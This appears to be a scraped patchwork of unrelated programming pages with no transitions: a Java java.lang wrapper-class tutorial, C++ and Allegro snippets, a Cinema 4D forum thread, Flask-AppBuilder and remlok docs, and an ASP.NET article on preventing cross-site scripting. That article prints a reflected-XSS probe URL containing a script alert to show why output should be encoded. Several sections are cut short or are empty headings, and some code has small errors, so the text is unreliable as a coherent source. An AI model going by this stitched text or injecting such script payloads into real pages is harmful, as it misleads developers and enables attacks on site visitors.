Employee e1 = new Employee();
Employee e2 = e1;
e1 == e2;      // true
e1.equals(e2); // true
The Object class contains a variation of the wait() method that is used to pause the currently running thread until some other thread invokes the notify() or notifyAll() method for this object.
The protected finalize() method of the class may be overridden to dispose of system resources or to perform other cleanup operations. However, Java does not guarantee that, on invocation of this method, the garbage collector will be promptly put into action nor is it recommended to explicitly use this method.
There is another protected method in the Object class, called clone(). It is mainly overridden to create a copy of the invoked object.
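A hedged sketch of such an override (the class is illustrative); note that the class must implement Cloneable, or super.clone() throws CloneNotSupportedException:

```java
// Overriding clone() to create a copy of the invoked object.
public class Point implements Cloneable {
    public int x, y;

    public Point(int x, int y) {
        this.x = x;
        this.y = y;
    }

    @Override
    public Point clone() {
        try {
            return (Point) super.clone(); // shallow, field-by-field copy
        } catch (CloneNotSupportedException e) {
            throw new AssertionError(e); // unreachable: we implement Cloneable
        }
    }

    public static void main(String[] args) {
        Point p = new Point(1, 2);
        Point copy = p.clone();
        System.out.println(copy.x + "," + copy.y); // 1,2 -- a distinct object
    }
}
```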
Wrapper Classes
The java.lang library provides wrapper classes for primitive data types such as int, char, float, and so forth. Primitive data types in Java are not part of the object hierarchy; they exist mainly for performance reasons. There are certain disadvantages to primitive types in Java: for example, when a primitive data type is passed as a method argument, it is passed by value. There is no way to pass it by reference directly. As a result, it is not possible to share the same instance of a primitive value across multiple methods. A wrapper class helps in creating an object representation of these primitive data types, somewhat like wrapping the primitive type within a class. This is the reason these classes are called wrapper classes.
The hierarchy of the wrapper classes is implemented as follows.
Figure 1: The wrapper classes hierarchy
Number, an abstract class, is the base class of all wrapper classes that represent numeric types. It contains abstract methods such as byteValue(), doubleValue(), floatValue(), intValue(), longValue(), and shortValue(), which return the object's value as a byte, double, float, int, long, and short, respectively.
Wrappers for Floating-point Type Numeric Values
The Double and Float classes are wrappers for floating-point types. Apart from providing numerous convenient methods, these classes provide constants, such as shown in the following instances:
For Double:
public class Main {
    public static void main(String[] args) {
        System.out.println("Maximum Exponent :" + Double.MAX_EXPONENT);
        System.out.println("Minimum Exponent :" + Double.MIN_EXPONENT);
        System.out.println("Maximum positive value :" + Double.MAX_VALUE);
        System.out.println("Minimum positive value :" + Double.MIN_VALUE);
        System.out.println("Width in bytes :" + Double.BYTES);
        System.out.println("Negative Infinity :" + Double.NEGATIVE_INFINITY);
        System.out.println("Positive Infinity :" + Double.POSITIVE_INFINITY);
        System.out.println("bit width of wrapped value :" + Double.SIZE);
    }
}
Output:
Maximum Exponent :1023
Minimum Exponent :-1022
Maximum positive value :1.7976931348623157E308
Minimum positive value :4.9E-324
Width in bytes :8
Negative Infinity :-Infinity
Positive Infinity :Infinity
bit width of wrapped value :64
Similarly, constant values can be obtained for the Float wrapper class. For details on various methods of these classes, refer to the Java API documentation.
Apart from many convenient methods, the Float and Double classes have two methods called isInfinite() and isNaN(). These two methods are implemented based on the IEEE floating-point specification of infinity and NaN (Not a Number). The method isInfinite() returns a boolean true value if the value on which it is tested is infinitely large or small in magnitude. And the method isNaN() returns true if the value on which it is tested is not a number.
public class Main {
    public static void main(String[] args) {
        System.out.println(new Double(1 / 0.).isInfinite());
        System.out.println(new Double(0 / 0.).isNaN());
    }
}
Output:
true
true

Wrappers for Integer Type Numeric Values
Integer, Long, Short, and Byte are wrappers for integer types. Apart from providing numerous convenient methods, these classes provide constants such as follows:
public class Main {
    public static void main(String[] args) {
        System.out.println("Maximum value :" + Integer.MAX_VALUE);
        System.out.println("Minimum value :" + Integer.MIN_VALUE);
        System.out.println("Width in bytes :" + Integer.BYTES);
        System.out.println("bit width of wrapped value :" + Integer.SIZE);
    }
}
Output:
Maximum value :2147483647
Minimum value :-2147483648
Width in bytes :4
bit width of wrapped value :32
Similarly, constant values can be obtained for Byte, Short, and Long. For details on various methods of these classes, refer to the Java API documentation.
A quick example of the utility of the Integer wrapper class is as follows.
public class Main {
    public static void main(String[] args) {
        System.out.println(Integer.toBinaryString(20));
        System.out.println(Integer.toHexString(20));
        System.out.println(Integer.toOctalString(20));
    }
}
Output:
10100
14
24
Wrapper for the char Type
The Character wrapper class wraps around the primitive data type char. It provides several static methods to categorize characters and alter their cases, such as isDigit(), isWhiteSpace(), toLowerCase(), and so on.
One of the intriguing aspects of this class is the support for Unicode characters. Prior to JDK version 5, Unicode characters were held in a 16-bit char. With the expansion of Unicode, the default size of char became insufficient to hold a character value ranging from 0 to 10FFFF. As a result, the technique of dealing with Unicode characters underwent interesting changes.
To understand how Java deals with Unicode, we must understand three basic terms: the Basic Multilingual Plane (BMP) includes characters from 0 to FFFF; Unicode characters beyond FFFF are called supplemental characters; and a code point is a character value in the range 0 to 10FFFF.
Java uses two char values to represent a supplemental character. The first char is called the high surrogate and the second the low surrogate. A new method, codePointAt(), was provided to translate between code points and supplemental characters. Java also overloaded several pre-existing methods to take an integer argument, such as:
static boolean isLetter(int codePoint)
static boolean isDigit(int codePoint)
static boolean isDefined(int codePoint)
The overloaded form takes an int rather than a char as an argument because a single int value is large enough to hold any code point, including those that need two chars.
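A short sketch of how a supplemental character shows up as a surrogate pair (the specific code point chosen here is just an example):

```java
// A supplemental character (code point above FFFF) occupies two char
// values, a surrogate pair, inside a Java String.
public class SurrogateDemo {
    public static void main(String[] args) {
        String s = new String(Character.toChars(0x1F600)); // a non-BMP code point
        System.out.println(s.length());                      // 2 char units
        System.out.println(s.codePointCount(0, s.length())); // 1 code point
        System.out.println(Character.isSurrogatePair(s.charAt(0), s.charAt(1))); // true
    }
}
```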
A Quick Example
public class Main {
    public static void main(String[] args) {
        System.out.println(Character.toLowerCase('A'));
        System.out.println(Character.isDigit('7'));
        System.out.println(Character.isLetter('5'));
        for (int i = 0x03B1; i < 0x03D1; i++)
            System.out.println(Character.getName(i) + "=" + (char) i);
    }
}
Output:
a
true
false
GREEK SMALL LETTER ALPHA=α
GREEK SMALL LETTER BETA=β
GREEK SMALL LETTER GAMMA=γ
...
Wrapper for Boolean Type
The class Boolean is a wrapper for the boolean primitive type. This class provides methods for converting boolean values to a string and vice versa, along with many useful constants. The main use of this class is when we want to pass a boolean by reference as a method argument.
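A quick, hedged sketch of the Boolean helpers in action:

```java
// Conversion helpers on the Boolean wrapper class.
public class BooleanDemo {
    public static void main(String[] args) {
        System.out.println(Boolean.parseBoolean("TRUE")); // true (case-insensitive)
        System.out.println(Boolean.parseBoolean("yes"));  // false (only "true" parses as true)
        System.out.println(Boolean.toString(false));      // "false"
    }
}
```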
Conclusion
The java.lang library has many other important classes and interfaces, and there are many sub-packages as well. But when one talks about this package, these two categories of classes must be the first point of discussion. Much as the Object class is never explicitly extended, the package java.lang is never explicitly imported, unless of course we are using entities defined in one of its sub-packages. One should have a very clear idea about what this package offers, because it houses many of the most basic classes and interfaces of the language.
Posted on December 31, 2015 by daryl

C++: Static variable

This entry is part 61 of 61 in the series C++.

A static variable takes its first initialized value and remains unchanged:

#include "stdafx.h"
#include <cstdlib>
#include <iostream>
using namespace std;

int main()
{
    for (int i = 2; i < 5; ++i)
    {
        static int a = i;
        cout << a << endl;
    }
    system("pause");
}
Dialog refresh works correct in R18... not in R21 ?
- marcelobruno last edited by m_magalhaes
Situation:
LogoButton.SetImage... (image of gui changes)
More code....
LogoButton.SetImage again. (image of gui changes)
End of code.
Problem in R21:
In R18 the image changes, then the rest of code keeps runing.
In R21 nothing is updated until the end of the code.
So in R18 this works correctly, but in R21 the bitmap of the button in the dialog Never changes until all the operations ends.
The only way I found to see the GUI update in R21 (of course, just as a test to help me detect the problem) is calling the command to show the About screen of C4D, or opening a modal dialog; the bitmap then changes, and when the modal dialog is closed the operation goes on.... I tried this, which already works in R18:
c4d.EventAdd()
c4d.EventAdd(c4d.EVENT_FORCEREDRAW)
c4d.DrawViews(c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW | c4d.DRAWFLAGS_NO_THREAD | c4d.DRAWFLAGS_NO_REDUCTION | c4d.DRAWFLAGS_STATICBREAK)
All this doesn't seem to force the update of the dialog on R21; it will only update the image at the end of the operations, or when a modal dialog or the About screen of C4D appears...

Regarding your issue, there are too many dark spots.
You are setting the image of an image button, but we need to know in which function you are doing it.

c4d.EventAdd() pushes an update event onto the stack, and DrawViews refreshes the Cinema 4D view (also updating the scene).

It's probably too many updates, just to change the image of a button.

So, are you doing that in your Command function? CreateLayout? Message?

Can you share a bit of your code?
Cheers,
Manuel.
Hi!
Thank you for answering!
Here a gif showing the problem, left side R18, right side R21
Main difference:
It seems R21 is not even updating the console for each print; it just updates when the script ends.
1 - self.btnImage.SetImage(self.image2, True) #Change image first
2 - self.testCode() # Sample test code just prints lot of stuff in console...
3 - self.btnImage.SetImage(self.image1, True) #Change image again
- m_magalhaes last edited by m_magalhaes
hi,
Thanks for taking the time to make that GIF, but I think I already understood your issue. Now we need to find the cause.

I asked you those questions to be able to point you in the right direction and investigate the issue.

As it seems to just be a dialog box with a button, maybe you can share your code and we can test it directly.

With only what you gave us, we can simply "guess" what you are doing.
With what you gave us, we can simply "guess" what you are doing.
Cheers,
Manuel
Here a link:
Download Code Here
Maybe it is the same problem/solution:
Is there a way to make the console behave like in R18, updating on each print instead of waiting for the full script to end to show the prints? For example, a simple for loop that prints stuff.
Thank you
Your link has expired. You can post the code directly in a posting, just use the little brackets icon.
Cheers
zipit
- marcelobruno last edited by marcelobruno
I zipped it because it contains 2 images in the folder 'res' of the plugin location:
*I think that just finding a way to update the interface, like the console printing each line of a while loop as it happens in R18, could also be the solution for this problem.
Link:
import c4d, os
from c4d import gui, documents
from c4d import utils
from c4d import plugins

PLUGIN_ID = 1029596

#Welcome to the world of Python

class MiDialogo(c4d.gui.GeDialog):
    dir, file = os.path.split(__file__)  # Gets the plugin's directory
    images_Path = os.path.join(dir, 'res')  # Adds the res folder to the path
    image1 = os.path.join(images_Path, 'image1.jpg')
    image2 = os.path.join(images_Path, 'image2.jpg')

    def CreateLayout(self):
        bc = c4d.BaseContainer()  # Create a new container to store the button image
        bc.SetBool(c4d.BITMAPBUTTON_BUTTON, True)
        self.AddStaticText(241798101, c4d.BFH_CENTER, 0, 0, name='Change bitmap first, run more code, then change again')
        self.btnImage = self.AddCustomGui(241798100, c4d.CUSTOMGUI_BITMAPBUTTON, "Bitmap Button", c4d.BFH_CENTER, 60, 70, bc)
        self.AddButton(241798102, c4d.BFH_CENTER, initw=150, inith=20, name="Test")
        self.btnImage.SetImage(self.image1, True)
        return True

    def testCode(self):
        i = 1
        while i < 6000:
            print(i)
            c4d.EventAdd()
            i += 1

    def Command(self, id, msg):
        if id == 241798102:
            # Change bitmap first, then run code, then change bitmap again
            self.btnImage.SetImage(self.image2, True)  # Change image first
            self.testCode()  # Sample test code
            #gui.MessageDialog('Here a code instead of a popup', c4d.GEMB_OK)
            self.btnImage.SetImage(self.image1, True)  # Change image again
        return True


class MyMenuPlugin(c4d.plugins.CommandData):
    dialog = None

    def Execute(self, doc):
        # create the dialog
        if self.dialog is None:
            self.dialog = MiDialogo()
        return self.dialog.Open(dlgtype=c4d.DLG_TYPE_ASYNC, pluginid=PLUGIN_ID, defaultw=200, defaulth=150, xpos=-1, ypos=-1)

    def RestoreLayout(self, sec_ref):
        # manage the dialog
        if self.dialog is None:
            self.dialog = MiDialogo()
        return self.dialog.Restore(pluginid=PLUGIN_ID, secret=sec_ref)


if __name__ == '__main__':
    okyn = plugins.RegisterCommandPlugin(PLUGIN_ID, "Change bitmap test", 0, None, "Change bitmap test", MyMenuPlugin())
    if (okyn):
        print "Change bitmap test"
No solution? Hmm. Is there no way to force an update of the dialog/console during the script, as R18 behaves, so each print appears at the right moment instead of waiting until the end of the script, or for a modal dialog to appear, for the dialog/console to update?
hello,
I can confirm the issue here, even in C++.

There are two issues here.

The Python console has been changed a lot; printing things out to the console is really slow (in general).

With the latest versions, you can print out lots of data and it doesn't block your code. That's why your loop executes much faster in R20/R21 than in previous versions.

There's no "flag" to make the console act as before.

The BitmapButton not updating is a lot more important and looks like a bug.

This is under investigation, and I'll be back to confirm whether it's a bug (both issues).
Cheers
Manuel.
@m_magalhaes Thank you a lot!
hello,
I don't think the console will be changed, and in R21 the redraw has been modified a bit.

Your code blocks the execution of the command, and it should not. This could be done differently, but that would mean a bit more work.

The easiest way to "force" the update of the dialog box is to ask for the mouse state. This will force the OS to ask for a redraw, and C4D will redraw the box.

Just add:
self.SetString(1003, "Before")
self.btnImage.SetImage(self.image2, True)  # Change image first
bc = c4d.BaseContainer()
c4d.gui.GetInputState(c4d.BFM_INPUT_MOUSE, c4d.BFM_INPUT_CHANNEL, bc)
Cheers,
Manuel
@m_magalhaes Epic, it works! :) Thank you very much, Manuel!
How would I initialize Allegro bitmaps (287, to be exact) in a for loop? The images are in a folder called "images" and the file names have the syntax image-0.jpg, image-1.jpg, image-2.jpg, ... Here is what I have so far; I have not tested it.
// not all the code
int num;
ALLEGRO_BITMAP *image[287] = {NULL};

for (num = 0; num < 287; num++)
    image[num] = al_load_bitmap("images/image-"".jpg"); // code needs the number of the image here ...

for (num = 0; num < 287; num++)
    al_destroy_bitmap(image[num]);
You can use a stringstream to get that:
#include <sstream>
std::stringstream s;
s << "image-" << i;
image[i] = al_load_bitmap(s.str().c_str());
I don't know about C++, but in regular use you do have to check if the image loaded.
he wanted to know how to get those file-names correct.
My bad.
I use this for my pacman game to load in my main character. He is on a sprite sheet which is basically just a group of images, all 50x50 each, 4 wide x 5 high.
pacman.sheet = al_load_bitmap("Graphics/Pacman.png");
if(!pacman.sheet) {
a5_error(AT, display.screen, "Failed to load Pacman bitmaps.");
shut_down();
exit(1);
}
for(int y = 0; y < 5; y++) { // bitmaps are 5 rows
for(int x = 0; x < 4; x++) { // by 4 columns
pacman.bitmap[4*y+x] = al_create_sub_bitmap(pacman.sheet, x*SPRITE_SIZE, y*SPRITE_SIZE,
SPRITE_SIZE, SPRITE_SIZE);
}
}
I have a function called shut_down(); that will destroy any bitmaps that were created. I don't like just exiting my program on error without first calling that to properly destroy anything that may have been created before the error.
Anyhow, this way you load in the graphics all at once, then you can procede to create subbitmaps of each image you want if they're all related (and small enough to fit on a single sheet).
Arthur: how will image[num] = al_load_bitmap("images/image-"".jpg"); know what image number to load?! I see you corrected that.
I have always done it like: (C code, I actually use C99 myself)
Also, when I save images like that, I like to name them with 3 numbers, like IMAGE000.JPG, IMAGE001.JPG ... IMAGE287.JPG, they will list in your directory in order this way... in which case you want to use something like:
sprintf(filename, "images/image%03d.jpg", i);
Wow, a quick reply!!! Thanks, I got the program going; it now successfully allocates all 287 bitmaps in a for loop with the correct file names. Since you guys helped me, I am willing to share my project and source code (still needs work though). I am creating a program which flashes images so fast it bypasses the conscious mind and goes to the subconscious mind. I'm using this with books I want to read, mostly programming books in PDF converted with ImageMagick to JPG. I've decided to call the program al_photoreader. In theory I will be able to bring this information back to the conscious mind by remembering my dreams. Hopefully somebody is interested.
This is the simplest code I have used for loading 8 audio samples in my program.
ALLEGRO_SAMPLE *sample[8];
ALLEGRO_SAMPLE_INSTANCE *sample_instance[8];
char path[30] = "data\\samples\\sample (0).wav";
for (int i = 0; i < 8; i++)
{
// replace character 22 of the path (index 21); result: sample (i+1).wav
path[21] = '0' + (i + 1); // '0' + n yields the matching digit character
cout << path << endl;
sample[i] = al_load_sample(path);
sample_instance[i] = al_create_sample_instance(sample[i]);
al_set_sample_instance_gain(sample_instance[i], samples_volume);
al_set_sample_instance_playmode(sample_instance[i], ALLEGRO_PLAYMODE_ONCE);
al_attach_sample_instance_to_mixer(sample_instance[i], al_get_default_mixer());
}
Actions
Define your view
You can set up your actions on records on the show or list views. This is a powerful feature: you can easily add custom functionality to your db records, like mass delete, sending emails with record information, special mass updates, etc.
Just use the @action decorator on your own functions. Here’s an example
from flask_appbuilder.actions import action
from flask_appbuilder import ModelView
from flask_appbuilder.models.sqla.interface import SQLAInterface


class GroupModelView(ModelView):
    datamodel = SQLAInterface(Group)
    related_views = [ContactModelView]

    @action("myaction", "Do something on this record", "Do you really want to?", "fa-rocket")
    def myaction(self, item):
        """
        do something with the item record
        """
        return redirect(self.get_redirect())
This will create the necessary permissions for the item, so that you can include or remove them from a particular role.
You can easily implement a massive delete option on lists. Just add the following code to your view. This example will tell F.A.B. to implement the action just for list views and not show the option on the show view. You can do this by disabling the single or multiple parameters on the @action decorator.
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket", single=False)
def muldelete(self, items):
    self.datamodel.delete_all(items)
    self.update_redirect()
    return redirect(self.get_redirect())
F.A.B. will call your function with a list of record items if called from a list view, or a single item if called from a show view. By default an action is implemented on both list and show views, so your methods should be prepared to handle a list of records or a single record:
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket")
def muldelete(self, items):
    if isinstance(items, list):
        self.datamodel.delete_all(items)
        self.update_redirect()
    else:
        self.datamodel.delete(items)
    return redirect(self.get_redirect())
I was looking for a way to solve this small boolean pointer reference problem but could not come to a solution. I know C++ becomes complex when it comes to the usage of pointers and references.

The code below passes a bool* through a chain of pointer assignments and finally tries to write true through it:
#include <iostream>
int main()
{
bool* temp= nullptr;
bool* temp2;
bool* temp3;
temp2 = temp;
temp3=temp2;
bool temp5 = true;
*temp3 = temp5;
std::cout << *temp <<std::endl;
return 0;
}
You are assigning a value through a nullptr. That is what is causing the segmentation fault.
Just replace the line

bool* temp = nullptr;

with this:

bool* temp = new bool;

It will work now. And don't forget to delete it with the delete operator.
On 2015-05-01 3:23 PM, Yury Selivanov wrote:
> Let.

To further clarify on the example:

class SomeIterable:
    def __iter__(self):
        return self
    async def __aiter__(self):
        return self
    async def __next__(self):
        print('hello')
        raise StopAsyncIteration

If you pass this to 'async for' you will get 'hello' printed and the loop will be over. If you pass this to 'for', you will get an infinite loop, because '__next__' will return a coroutine object (that has to be also awaited, but it wouldn't be, because it's a plain 'for' statement). This is something that we shouldn't let happen.

Yury
- Preventing XSS in ASP.NET
Thursday, August 07, 2014, by martijn broed. I have written about SQL Injection and Cross Site Request Forgery in ASP.NET apps before. This article looks at preventing Cross Site Scripting, a third common type of vulnerability in websites.
While a modern framework does much to make these attacks more difficult, I believe we should first have an understanding of the ways an app is vulnerable to an attack. First, let's look at what Cross Site Scripting is and how it can be exploited.
What Is Cross Site Scripting.
A Persisted XSS Attack.
A Reflected XSS Attack.
DOM Based Attacks.
Protecting From Cross Site Scripting Attacks.
Validate All Input.
If we know a value should always be an integer, then you can validate the input using code such as:
int memberId;
if (!int.TryParse(externalValue, out memberId))
{
    return RedirectToAction("InputError");
}
If the framework cannot parse the previously retrieved externalValue as an integer, the code redirects to a page that would display an error. Otherwise we know that memberId contains an integer value. This process also works with other basic types. Some more common types also provide methods to validate the information. The .NET Uri class contains a method IsWellFormedUriString that can validate a URL. This would allow validation that a user's homepage entry contains a valid URL before display.
var userHomePage = userRecord["homepage"];
if (!Uri.IsWellFormedUriString(userHomePage, UriKind.Absolute))
{
    Model.homepage = "none";
}
else
{
    Model.homepage = Html.Encode(userHomePage);
}
Other and more complex data types need more complex validation. Validation of a credit card number field could remove any characters in the string that are not digits. Validation of more complex strings could need regular expressions. Validation of a class may need more complex checks as well.
ASP.NET Request Validation
ASP.NET provides effective protection against reflected attacks using request validation. If ASP.NET detects markup or code in a request, it throws a "potentially dangerous value was detected" exception and stops the processing of the request.
Adding validateRequest="false" to the Page directive in Webforms would turn the validation off for a page. In ASP.NET MVC, adding the [ValidateInput(false)] attribute to a controller action turns off validation for that action, while adding the [AllowHtml] attribute turns off validation for a field.
ASP.NET 4.0 changed request validation in several ways. This and later versions of the framework do validation early in the HTTP request. The validation also applies to all ASP.NET requests and not just .aspx page requests. This includes custom HTTP modules too. Pages that rely on the original behavior can revert to the older method by setting the requestValidationMode attribute in the web.config file to version 2.0.
<httpRuntime requestValidationMode="2.0" />
Even better is to disable this only for pages where needed, using this syntax in the web.config file:

    <location path="novalidationpage.aspx">
      <system.web>
        <httpRuntime requestValidationMode="2.0" />
      </system.web>
    </location>
ASP.NET 4.5 added the ability to defer validation until requesting the data. Setting the requestValidationMode attribute in your web.config file to version 4.5 activates this new behavior.
<httpRuntime requestValidationMode="4.5" />
ASP.NET 4.5 also added the HttpRequest.Unvalidated property. Using this property allows easier access to the unvalidated form value where needed. By combining delayed validation and the Unvalidated property, you can access the unvalidated values when needed, but protect other form inputs.
Encoding HTML

The resulting page shows the message to the user with a field, such as:
<%= Html.Label("Message", Model.message) %>
... and displays as:
If we change the URL call to http://appname/placeorder/<script>alert('hello!');</script>, we now get something different.
The script could be anything of course and not just the harmless alert box that appears here. Request Validation would catch the above examples and return an exception before display. If turned off though, then encoding the output prevents the attack.
ASP.NET makes it easy to encode data in order to prevent attacks. Early versions of MVC using Webform's syntax often contained code such as this which did not encode HTML.
<p id="status"><%= status %></p>
You had to manually encode the output so that any HTML would be converted into a display format. So the < character becomes the string &lt;. The Html.Encode function provides this conversion. The safer form of code thus becomes:
<p id="status"><%= Html.Encode(status) %></p>
ASP.NET MVC later introduced a syntax for doing this in one step by replacing <%= with <%: so the code can be shortened to:
<p id="status"><%: status %></p>
Using the Razor view engine, all output is HTML encoded unless you specifically use a method to not encode it. In Razor, the code equivalent to the above becomes:
<p id="status">@status</p>
Razor automatically handles HTML encoding of whatever the string status contains. In a case where you need to render the raw data, you can use the Html.Raw() method. To display the result without encoding, we can use:
<p id="status">@Html.Raw(status)</p>
In this example, the above code would make our application vulnerable again.
AntiXSS Library
If you're writing an ASP.NET application, you should use the AntiXSS Library for ASP.NET. From the project's website, "AntiXSS provides a myriad of encoding functions for user input, including HTML, HTML attributes, XML, CSS and JavaScript."
The default HtmlEncode methods use a black-listing approach that only encodes certain, potentially dangerous characters.
Microsoft began including core routines from this library into ASP.NET 4.5 in a new System.Web.Security.AntiXss namespace. You can also set up the framework to use these AntiXSS methods in place of the built-in encoding routines. You do this by setting the encoderType attribute of httpRuntime in the web.config file for the application:
<httpRuntime ....
In Summary
Preventing cross site scripting is harder than it initially seems. OWASP lists over 80 vectors that can be targeted using cross site scripting attacks. That organization also lists these vulnerabilities as third in their 2013 list of top ten web vulnerabilities.
If you do not ensure that all outside data brought into your application is properly escaped or do not validate input before placing it on an output page, you leave your web application vulnerable to cross site scripting. In ASP.NET, this can be done by:
- Validating all external input to your application before displaying it on a webpage.
- Using Request Validation everywhere that your application doesn't specifically need it turned off, such as a form allowing rich HTML input. If you must allow unvalidated information, leave validation on everywhere else in your application.
- Encoding HTML before displaying external data on a webpage.
- Using the AntiXSS-based methods included in ASP.NET 4.5, and the AntiXSS library for older versions of ASP.NET.
remlok
This is a very small and simple web framework, which still aims to tackle complicated problems.
Think re-frame talking to the server out of the box.
Prerequisites
If you haven’t already, you really want to read the re-frame tutorial.
If you have used re-frame, you will get a grasp of this one in no time.
Understanding of how reagent components and reactions work is required.
Also, note that remlok is a no-magic framework. It keeps things simple and not surprising, but this also means that you shouldn’t be afraid to get your hands dirty, since it doesn’t do much by default.
In a nutshell
This is what happens when you use remlok:
db -> read -> :loc -> render -> user action -> mut! -> :loc -> db* | | v v :rem :rem | | ------------> send <------------------- | v remote | v merge! | v db*
It’s your typical eternal cycle of data, flowing, but with a twist – it has a branch which leads to the remote.
As you can see, remlok allows you to have your say on every step of the application lifecycle. It also tries to be as predictable and reasonable as possible with its default actions.
Locrem
Read and mutation functions return locrems.
A locrem is a map
{:loc local-result :rem send-this-to-remote}
Both :loc and :rem are optional.
Query
A query is a pair
[topic args]
Both for reads and mutations.
It is considered appropriate to omit the args, e.g. [:cur-user], [:log-out], etc.
Read
You set up your read functions with pub like this
(pub :cur-user (fn [db _] ;; this is the read function {:loc (reaction (get @db :cur-user))}))
remlok will use the query’s topic to decide on the read function.
Read function will receive two arguments, db and query.
db – the application state ratom.
query – the query to read.
Read function must return this locrem
{:loc reaction :rem query}
Render
Just use reagent components.
(defn users [] (let [users (read [:users {:first 10}])] (fn [] [:ul (for [{:keys [id name]} @users] ^{:key id} [:li name])])))
Mutation
You set up your mutation functions with mut like this
(mut :logout (fn [db _] ;; this is the mutation function {:loc (dissoc db :cur-user) :rem [:log-out]}))
remlok will use the query’s topic to decide on the mutation function.
Mutation function will receive two arguments, db and query.
db – the application state.
query – the query to mutate.
Mutation function must return this locrem
{:loc db* :rem query}
Send
You set up your send function with send like this
(send (fn [req res] ;; this is the send function (my-network/send (my-edn/serialize req) (comp res my-edn/deserialize))))
Send function will receive req and res arguments.
req – the request.
res – the callback to call with the response, once it’s available from the remote.
The request has the format
{:reads [query0 query1 ...] :muts [query0 query1 ...]}
Note that remlok will be smart enough to batch the queries.
Novelty
The novelty must have the format
[[query0 data0] [query1 data1] ...]
Merge
You set up your merge function with merge like this
(merge :new-score (fn [db _ score] ;; this is the merge function (update db :score + score)))
remlok will use the query’s topic to decide on the merge function.
Merge function will receive three arguments, db, query and data.
db – the application state.
query – the query, the result of which you’re merging.
data – the result itself.
Merge function must return the new application state.
How does merging work?
The function which merges a novelty is called merge!. remlok will call it for you when your send function calls its res callback.
As we already know, the novelty should have the format
[[query0 data0] [query1 data1] ...]
As you can see, those are just [query data] pairs, where the data is the result of the corresponding query.
For example, if you have a request
{:reads [[:user 1] [:user 2]] :muts [[:user/new {:id "tmp_id_1" :name "Alice"}]]}
you may receive
[[[:user 1] {:id 1 :name "Bob"}] [[:user 2] {:id 2 :name "Shmob"}] [[:user/new {:id "tmp_id_1" :name "Alice"}] {:id 3}]]
By setting up merge handlers for the topics, you can control how all those things are getting integrated into your application state.
For example, you may want to patch your temporary ids like this (super naive but demonstrates the point):
(merge :user/new (fn [db [_ {tmp-id :id}] {id :id}] (let [user (get-in db [:users tmp-id])] (-> db (update :users dissoc tmp-id) (assoc-in [:users id] user)))))
Note that you can call merge! by yourself at any time with any properly formatted novelty. This is useful if you want to handle push updates from the remote (i.e. when there’s no send before the merge).
Remote
The remlok.rem namespace exposes pub, mut, read and mut! functions, along with the fallbacks pubf and mutf.

read and mut! allow you to pass the ctx, any clojure value, which will be passed to your handler functions.
remlok has no further opinions on how you handle things on your server.
Something like this:
(pub :users (fn [db-conn [_ {:keys [name]}]] (my-sql-lib/select db-conn "select * from users where name = :name" {:name name}))) (def db-conn (my-sql-lib/open-connection)) (defn endpoint [req] (let [{:keys [reads]} (my-edn/deserialize req) res (for [query reads] [query (read db-conn query)])] (my-edn/serialize res))) (my-network/listen! 80 endpoint)
Fallbacks
remlok provides fallbacks for everything, so it can function on its own, without you specifying a single handler. (Obviously, the send fallback doesn’t actually do anything except emitting a warning that it doesn’t do anything.)
Fallbacks have f at the end – pubf, mutf, sendf and mergef, and are public. Their docstrings explain what they do (they don’t do a whole lot).
Read, mutation and merge fallbacks are initially registered for the :remlok/default topic. When remlok can’t find the handler for a topic, it just uses whatever handles :remlok/default. Note that the handler is given the initial query (and, therefore, the initial topic).
Of course, you can set up your own fallback (the "default" handler):
(pub :remlok/default (fn [db query] (println "Warning! Unknown query " (str query)) nil ;; nil is explicit to emphasize that we are returning an empty locrem ))
Note that even if you set up your own default handler, you still can use default fallbacks:
(pub :search-input pubf ;; simple enough for pubf to handle )
Examples
They feature optimistic updates and all that!
Why remlok?
Because you will learn it in dozens of minutes, and it will let you do things that are still often deemed non-trivial.
(Of course, I’m supposing that you already can read and write Clojure and know what reagent is all about.)
Why not declarative queries like in om.next?
Well, first of all, your queries are just data, so they are declarative; they are just not nested out of the box.
It was a very deliberate decision to keep the queries flat, since the API and all the machinery was getting seriously complicated, and remlok was on the verge of stopping being "miniature".
So, much like in re-frame, you can not nest queries, but I strongly believe that not all applications actually need recursive/deeply nested queries.
(Actually, feel free to check recursive-queries branch, which is trying to have om.next-like queries.)
(Also, you can emulate recursive queries to some extent, having all that "friend of friend of friend" madness in your args.)
Why request has :reads and :muts, but response (and novelty in general) does not?
The request sent to your remote has :reads and :muts to let your remote know how to process each query. Since queries have exactly the same format for reads and mutations, this will let you know when to use read and mut! on the remote.
On the other hand, the response is just a vector of pairs [query data].

That’s because, from the client’s point of view, all that comes from the remote is reads. For example, if the client sends a mutation [:user/new "Alice"], the response [[:user/new "Alice"] {:id 1}] is not a "mutation", it’s a read of the result of that mutation. Basically, the client sends reads and mutations, and says, "I want the response to be the reads of the results of all those operations I sent".
Why global state?
Just like re-frame, remlok uses global state, so you can have only one application per client context (and only one application per server context, for that matter).
Of course, this solution isn’t quite optimal, so any feedback is welcome!
Why should I handle requests by hand on the remote?
Since you may be composing your response in a non-trivial fashion.
One of the examples, "Wiki Autocompleter", features such a case (it uses core.async to wait for the reads to be completed).
License
Distributed under the Eclipse Public License, the same as Clojure.
Jsp code:
<r:tabPanel switchType="client" binding="#{binding.tabPanel1}"...
@Name("binding")
@Scope(ScopeType.CONVERSATION)
public class Binding implements Serializable {

    @Logger
    Log log;

    private HtmlTabPanel tabPanel1 = new HtmlTabPanel();

    public HtmlTabPanel getTabPanel1() {
        log.debug("GET TAB PANEL1" + tabPanel1);
        return tabPanel1;
    }

    public void setTabPanel1(HtmlTabPanel tabPanel1) {
        log.debug("SET TAB PANEL1" + tabPanel1);
        this.tabPanel1 = tabPanel1;
    }
}
javax.el.PropertyNotFoundException: Target Unreachable, identifier 'binding' resolved to null...
Looks like the Seam conversation scope is stored somewhere in the view state, and therefore is initialized only after the component tree. So binding to a conversation-scoped bean most likely causes the failure.
I would recommend to use request or session scoped bean.
That is not a RichFaces issue but Seam's. I may be wrong, so ask in the Seam forum to know for sure.
I just had a similar problem, I solved it by outjecting the binding object.
There is actually an aptly named chapter in the seam docs for this, which I completely missed ;)
The seam forum post is here:
I have been working on creating a simple ftplib upload script that can send a file to a server. Everything works fine but now I want to know if its possible to use a html form to allow a user to chose the file to be uploaded. This would mean defining the file from the form in the script. I am unsure of how to go about this?
Here is my ftp upload script:
import ftplib

filename = 'test.doc'
ftp = ftplib.FTP('ftp.*******.com')
